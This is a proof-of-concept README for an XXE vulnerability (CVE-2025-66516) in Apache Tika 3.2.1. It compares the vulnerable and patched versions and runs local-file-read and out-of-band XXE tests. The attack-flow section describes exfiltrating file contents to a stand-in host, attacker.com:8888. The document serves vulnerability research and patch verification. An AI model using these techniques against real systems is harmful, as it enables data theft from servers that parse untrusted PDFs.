## https://sploitus.com/exploit?id=D9B0ECDF-4B8A-5236-88D7-DFA7BB1F80BF
# โ ๏ธ **[READ DISCLAIMER BEFORE USE](DISCLAIMER.md)** โ ๏ธ
**Educational/Authorized Testing Only** | [License](LICENSE) | [Security Policy](SECURITY.md)
---
## Setup POC Directory
```bash
mkdir apache_tika_poc
cd apache_tika_poc
```
## Environment Verification
```bash
# Check Java version
java -version
javac -version
# Check OS version
lsb_release -a
```
## Download Apache Tika JARs
```bash
# Download vulnerable Tika version
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.1/tika-app-3.2.1.jar
# Download patched Tika version
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.2/tika-app-3.2.2.jar
```
## Verify Component Versions
```bash
# Check vulnerable version manifest
unzip -p tika-app-3.2.1.jar META-INF/MANIFEST.MF
# Check patched version manifest
unzip -p tika-app-3.2.2.jar META-INF/MANIFEST.MF
```
### List Component POM Properties
If we look at the Project Object Models (Maven's POM properties define a project's dependencies, build configuration, and metadata.), we see there are no separate tika-parsers as mentioned in the security advisories - could be a version related thing and the assumption is in versions 3.2.1 and 3.2.2, which are part of the POC, the tika-parsers module were replaced by individual parser modules.
```bash
# List all component pom.properties files for both versions
unzip -l tika-app-3.2.1.jar | grep pom.properties | grep tika
unzip -l tika-app-3.2.2.jar | grep pom.properties | grep tika
```
### Check Tika Component Versions
```bash
# Check tika-core, tika-parser-pdf-module, and tika-app versions for 3.2.1
unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-core/pom.properties && echo "---" && unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-parser-pdf-module/pom.properties && echo "---" && unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-app/pom.properties
# Check tika-core, tika-parser-pdf-module, and tika-app versions for 3.2.2
unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-core/pom.properties && echo "---" && unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-parser-pdf-module/pom.properties && echo "---" && unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-app/pom.properties
```
## Create Target File for XXE Exploitation
```bash
# Create target secret file
echo "INTERNAL_SERVER_KEY=EXPOSED" > fake-secrets.txt
```
## Code Analysis: Compare Vulnerable vs Patched
```bash
# Extract vulnerable JAR for analysis
mkdir tika-3.2.1-extract && cd tika-3.2.1-extract && unzip -q ../tika-app-3.2.1.jar && cd ..
# Extract patched JAR for analysis
mkdir tika-3.2.2-extract && cd tika-3.2.2-extract && unzip -q ../tika-app-3.2.2.jar && cd ..
# Decompile vulnerable class
cd tika-3.2.1-extract && javap -c org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.1.txt && cd ..
# Decompile patched class
cd tika-3.2.2-extract && javap -c org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.2.txt && cd ..
# Compare versions
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt
```
### Identify The Fix
If we compare carefully we find any Doctype definition (DTD) and external Entities support is disabled in 3.2.2 - this is the crux of the fix:
```bash
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt | grep -A2 -B2 "accessExternalDTD\|supportDTD\|isSupportingExternalEntities"
```
## POC #1: Local File Read XXE
```bash
# Generate malicious PDF
python3 ./gen_poc.py
# Test with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve_2025_66516_poc.pdf
# Test with patched Tika 3.2.2
java -jar tika-app-3.2.2.jar -t cve_2025_66516_poc.pdf
```
## POC #2: Out-of-Band XXE
```bash
# Generate out-of-band XXE PDF
python3 ./gen_oob_poc.py
# Start HTTP listener (in separate terminal)
python3 ./http_listener.py
# Test OOB XXE with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve-2025-66516_OOB_XXE.pdf
# Test OOB XXE with patched Tika 3.2.2
java -jar tika-app-3.2.2.jar -t cve-2025-66516_OOB_XXE.pdf
```
## Application-Level Testing
```bash
# Compile with vulnerable Tika
javac -cp tika-app-3.2.1.jar DocumentProcessor.java
# Run with vulnerable Tika
java -cp tika-app-3.2.1.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf
# Compile with patched Tika
javac -cp tika-app-3.2.2.jar DocumentProcessor.java
# Run with patched Tika
java -cp tika-app-3.2.2.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf
```
## Cleanup
```bash
# Remove extraction directories
rm -rf tika-3.2.2-extract/
rm -rf tika-3.2.1-extract/
rm XMLReaderUtils-*.txt
```
---
## Understanding the Attack Flow
### Local File System XXE Attack Sequence
1. PDF contains XFA stream with DOCTYPE + ENTITY declaration
2. Tika detects XFA โ calls XFAExtractor
3. XFAExtractor creates XML parser via XMLReaderUtils
4. Parser processes DOCTYPE, registers xxe entity
5. Parser encounters &xxe; reference
6. Parser resolves entity โ reads file:///fake-secrets.txt
7. File contents inserted into XML at &xxe; location
8. XFAExtractor extracts field value = file contents
9. Application receives secret data in Tika output
### Out-of-Band (OOB) XXE Attack Sequence
1. PDF contains XFA with DOCTYPE declaring parameter entities (%file, %dtd)
2. Tika detects XFA โ calls XFAExtractor
3. XFAExtractor creates XML parser via XMLReaderUtils
4. Parser processes DOCTYPE, registers %file entity โ points to file:///fake-secrets.txt
5. Parser encounters %dtd; reference โ points to http://attacker.com:8888/evil.dtd
6. Parser makes HTTP GET request to attacker's server to fetch evil.dtd
7. Attacker's HTTP server receives request, serves evil.dtd content
8. Parser processes evil.dtd: defines %payload entity containing &send definition
9. evil.dtd expands %payload โ creates &send entity with exfiltration URL
10. &send entity contains: http://attacker.com:8888/exfil?data=%file;
11. Parser expands %file; inside &send URL โ file contents inserted
12. Parser resolves &send; entity โ makes HTTP GET to exfiltration endpoint
13. Attacker's HTTP server receives /exfil request with file contents in URL parameter
14. Attacker extracts data from URL parameter, logs secret file contents
15. Application output irrelevant โ data already exfiltrated to attacker's server